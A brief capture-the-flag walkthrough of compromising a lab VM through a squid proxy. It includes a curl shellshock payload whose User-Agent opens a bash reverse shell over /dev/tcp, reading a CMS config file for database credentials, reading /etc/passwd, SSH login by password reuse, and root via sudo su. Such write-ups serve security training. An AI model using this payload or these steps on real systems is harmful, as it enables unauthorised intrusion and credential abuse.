A scan shows port 22 and 3128 open, but port 8080 is closed and is an http-proxy.


3128 shows that it’s a squid proxy, so I set my proxy settings in Firefox to that port.


Going to the IP now shows a website


Nikto scan using the proxy settings reveals a few interesting things

nikto --useproxy -h

With the most interesting being shellshocks4

I also ran it through dirbuster (had to also configure proxy settings) and came up with a few interesting directories but nothing out of the ordinary. I decided to pursue the shellshock vulnerability first.

curl -x -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/ 0>&1"


Following my privilege escalation Workflowy list, I checked the config.php file located in /var/www/wolfcms and find mysql credentials


I try to login but it never opens a Mysql prompt


So back to square one.

I did have a password, john@123 so possibly there was password reuse. I do

cat /etc/passwd

to view the users.

I try the password via SSH with user sickos and it works!


I then check the bash history which reveals the command sudo su


which works and I am now root


Aside from the MySql issue, I didn’t run into any other issues with this VM so I actually enjoyed this one.